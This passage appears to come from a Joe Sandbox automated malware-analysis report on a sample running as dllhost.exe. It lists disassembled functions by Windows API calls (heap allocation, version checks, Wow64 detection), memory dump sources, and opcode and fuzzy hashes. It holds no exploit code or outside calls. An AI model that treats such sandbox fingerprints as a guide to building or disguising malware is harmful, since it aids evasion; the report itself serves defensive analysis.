                                                                                                                      • HeapAlloc.KERNEL32(00000000), ref: 004010DF
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 00401101
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00401108
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$AllocEnumFreeInfoQueryValue
                                                                                                                      • String ID: d
                                                                                                                      • API String ID: 3743429067-2564639436
                                                                                                                      • Opcode ID: 7b4d3b6641b07eb937e7a369afc3294f1d3ce15779a756da97ef228e243b234e
                                                                                                                      • Instruction ID: 57caec0935285c63823a40c3b790b2e44c04603e6b4b5bea2248a5db0420a1a1
                                                                                                                      • Opcode Fuzzy Hash: 7b4d3b6641b07eb937e7a369afc3294f1d3ce15779a756da97ef228e243b234e
                                                                                                                      • Instruction Fuzzy Hash: 2E314DB1A00109AFEB14CF95C985EAFB7BCFB48355F10813AE615A7250D734AE51CBA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00402119,00000000,?,00000000,?,?,00401269), ref: 00401303
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00401269), ref: 0040130A
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,?,00401269), ref: 00401329
                                                                                                                      • HeapFree.KERNEL32(00000000,?,?,00401269), ref: 00401330
                                                                                                                      • lstrlenW.KERNEL32(00000000,00000000,?,00000000,?,?,00401269), ref: 0040133A
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000000,?,00401269), ref: 0040134A
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,00401269), ref: 00401351
                                                                                                                      • StrCpyW.SHLWAPI ref: 0040136C
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$Process$Alloc$Freelstrlen
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 323503520-0
                                                                                                                      • Opcode ID: 77067b0d86f020f0006faa5050e86f85831b5ac361377b68dab5ac07c0838897
                                                                                                                      • Instruction ID: 0c35d41d4a5831c7286e3a859a2d67a993266f93d668fef154473b9164c6d7c4
                                                                                                                      • Opcode Fuzzy Hash: 77067b0d86f020f0006faa5050e86f85831b5ac361377b68dab5ac07c0838897
                                                                                                                      • Instruction Fuzzy Hash: 8A119DB1601221EFD700DF64D988E5ABBACFF89352B10816AF506E7354DB70AA01CBA4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,74DEF380,004020AE), ref: 004012A1
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 004012A8
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,00000000,00000000,74DEF380,004020AE), ref: 004012B4
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 004012BB
                                                                                                                      • GetProcessHeap.KERNEL32(00000000), ref: 004012CA
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 004012D1
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3859560861-0
                                                                                                                      • Opcode ID: 45446f9ffb7c27f9e168ee55d5c56946529401b288a5ee0ba804ee7e853b28ec
                                                                                                                      • Instruction ID: b9b7e015a57eb0db395fe518e4433acabc3da38b8c0af5df2f90cb499903a53d
                                                                                                                      • Opcode Fuzzy Hash: 45446f9ffb7c27f9e168ee55d5c56946529401b288a5ee0ba804ee7e853b28ec
                                                                                                                      • Instruction Fuzzy Hash: CEF08272301200AFE6106FE49C49F1A7B9DEB84712F004429F249A7090CA74A8409778
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • VerSetConditionMask.NTDLL(00000000,00000000,00000002,00000003), ref: 004019D6
                                                                                                                      • VerSetConditionMask.NTDLL(00000000), ref: 004019DA
                                                                                                                      • VerSetConditionMask.NTDLL(00000000), ref: 004019DE
                                                                                                                      • VerifyVersionInfoW.KERNEL32 ref: 004019EB
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: ConditionMask$InfoVerifyVersion
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 2793162063-0
                                                                                                                      • Opcode ID: 2787407655efc20fff6a9d8b53e8ad4e77dfa48991eab2c65fe5d204cd485eb4
                                                                                                                      • Instruction ID: b3088378c453d95af0c4542853b38df63fe50f7082c2df03651b23dc33d80260
                                                                                                                      • Opcode Fuzzy Hash: 2787407655efc20fff6a9d8b53e8ad4e77dfa48991eab2c65fe5d204cd485eb4
                                                                                                                      • Instruction Fuzzy Hash: A9F018B0A9431C79FB289B64DC1BFEB7A7CDB45B00F0081597205F61C1D5B45B414AE4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetCurrentProcess.KERNEL32(?,ntdll.dll,ntdll.dll,?,00401DEC), ref: 00401A08
                                                                                                                      • IsWow64Process.KERNEL32(00000000,?,00401DEC), ref: 00401A0F
                                                                                                                      Strings
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Process$CurrentWow64
                                                                                                                      • String ID: ntdll.dll
                                                                                                                      • API String ID: 1905925150-2227199552
                                                                                                                      • Opcode ID: 03295c593a5503e2dde2a986b3379b6811fbb451b98e02955a8ef8d2f1d28dfd
                                                                                                                      • Instruction ID: 06259989cea86e0b061d28083f79a8307f71ba07c1a95a57cc55de1362444462
                                                                                                                      • Opcode Fuzzy Hash: 03295c593a5503e2dde2a986b3379b6811fbb451b98e02955a8ef8d2f1d28dfd
                                                                                                                      • Instruction Fuzzy Hash: CFD01271A02224FFCA109B95AD0898FBBACEA44B417104066A501F2154D674DF04DAE4
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000010,00000000,00401399,?,?,?,?,?,0040207F), ref: 00401163
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040116A
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,?,0040207F), ref: 00401187
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040118E
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1617791916-0
                                                                                                                      • Opcode ID: 885a11a9880dcc0c819abbe253fd760aedac661f3a7600194844b7c3d13ba120
                                                                                                                      • Instruction ID: 4b654fa5435c37f94ce0262a310420d91d61308a5e9fd9e293b9bf8f3483adb4
                                                                                                                      • Opcode Fuzzy Hash: 885a11a9880dcc0c819abbe253fd760aedac661f3a7600194844b7c3d13ba120
                                                                                                                      • Instruction Fuzzy Hash: 4EE0B6B1741701AFE3005F66ED0DB05BEA8BB84713F008525F209A6294C7F9A150CB68
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,0000000C,00000000,004013A0,?,?,?,?,?,0040207F), ref: 00401005
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 0040100C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,00000040,?,?,?,?,?,0040207F), ref: 00401022
                                                                                                                      • HeapAlloc.KERNEL32(00000000,?,?,?,?,?,0040207F), ref: 00401029
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$AllocProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1617791916-0
                                                                                                                      • Opcode ID: 9ab1f129f06e7e311e7c1b3ccb71ffef87ef0444cbad93c226a97160af2f3025
                                                                                                                      • Instruction ID: 3655e1e9d02de74c639ba0de4372b024f1e7c357000c5007300e266bd1ea0d1f
                                                                                                                      • Opcode Fuzzy Hash: 9ab1f129f06e7e311e7c1b3ccb71ffef87ef0444cbad93c226a97160af2f3025
                                                                                                                      • Instruction Fuzzy Hash: A8E0E2B1741301AFE7405FA6ED0DB067EA8BB84713F008521F206E6298C7B49100CB28
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?,74DEF380,004020B6), ref: 00401135
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 0040113C
                                                                                                                      • GetProcessHeap.KERNEL32(00000000,?), ref: 0040114F
                                                                                                                      • HeapFree.KERNEL32(00000000), ref: 00401156
                                                                                                                      Memory Dump Source
                                                                                                                      • Source File: 00000017.00000002.2086552799.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_23_2_400000_dllhost.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Heap$FreeProcess
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 3859560861-0
                                                                                                                      • Opcode ID: d1c54a0f835e7ba13855c51fd6259624f5865ec1ca741ca66227df171c51b8af
                                                                                                                      • Instruction ID: 2693185da4d0c2e810f24c4556aaef60f99b1188b93b94b34d5ef21fdf38a5ee
                                                                                                                      • Opcode Fuzzy Hash: d1c54a0f835e7ba13855c51fd6259624f5865ec1ca741ca66227df171c51b8af
                                                                                                                      • Instruction Fuzzy Hash: 09D067B2341200EFEA042FE0AD8EB593A5CAB48B13F008425F20AA90A5CAB599448738
                                                                                                                      Uniqueness

                                                                                                                      Uniqueness Score: -1.00%